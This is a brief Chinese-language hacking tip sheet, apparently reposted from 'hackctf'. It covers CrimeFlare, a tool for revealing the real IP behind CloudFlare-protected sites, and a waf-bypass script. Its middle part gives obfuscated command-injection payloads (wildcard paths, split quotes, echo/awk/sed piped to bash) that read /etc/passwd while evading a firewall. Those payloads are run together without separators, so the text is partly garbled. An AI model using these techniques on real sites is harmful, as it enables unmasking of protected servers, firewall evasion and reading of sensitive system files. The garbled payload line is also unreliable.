一、CrimeFlare
利用CrimeFlare查看受CloudFlare保护的网站背后真实IP的工具。
-
CloudFlare IP -
真实IP -
主机名 -
组织 -
城市 -
国家 -
邮政 -
地点 -
时区
php crimeflare.php exemple.com
cat /etc/passwd
可以通过以下方式执行命令:%2f???%2f??t%20%2f???%2fp??s??cat+/e't'c/pa'ss'wde'c'ho 'swd test pentest' |awk '{print "cat /etc/pas"$1}' | bashec'h'o 'cat /etc/examplewd' | sed 's/example/pass/g' | bash
python3 /opt/waf-bypass/main.py --host ='example.com'
或者python3 /opt/waf-bypass/main.py --host ='example.com'--proxy ='http://proxy.example.com:3128'
转自:hackctf